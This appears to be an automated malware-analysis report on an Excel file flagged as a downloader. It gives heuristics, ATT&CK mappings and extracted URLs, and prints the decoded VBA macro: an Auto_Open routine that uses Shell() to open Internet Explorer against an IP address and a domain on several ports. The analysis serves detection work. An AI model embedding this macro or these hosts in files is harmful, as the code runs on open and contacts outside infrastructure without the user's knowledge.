MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The Auto_Open VBA macro contains multiple Shell() calls that execute Internet Explorer to visit various URLs. This behavior is consistent with a downloader that fetches a secondary payload. The ClamAV detection name 'Xls.Downloader.W2000m-10009382-0' further supports this assessment.
Heuristics 6
-
ClamAV: Xls.Downloader.W2000m-10009382-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Downloader.W2000m-10009382-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://46.252.73.45?bch=ping In document text (OLE body)
- http://46.252.73.45:8080?bch=pingIn document text (OLE body)
- http://www-direct.crest-approved.org?bch=pingIn document text (OLE body)
- http://46.252.73.45:53?bch=pingIn document text (OLE body)
- http://www-direct.crest-approved.org:8080?bch=pingIn document text (OLE body)
- http://www-direct.crest-approved.org:53?bch=pingIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1763 bytes |
SHA-256: dff259a3522426d3904ccd107cb0487d61e3b186bc56550fab2fb652f5963cce |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
Shell ("c:\progra~1\intern~1\iexplore http://www-direct.crest-approved.org?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://46.252.73.45?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://www-direct.crest-approved.org:8080?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://46.252.73.45:8080?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://www-direct.crest-approved.org:53?bch=ping")
Shell ("c:\progra~1\intern~1\iexplore http://46.252.73.45:53?bch=ping")
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.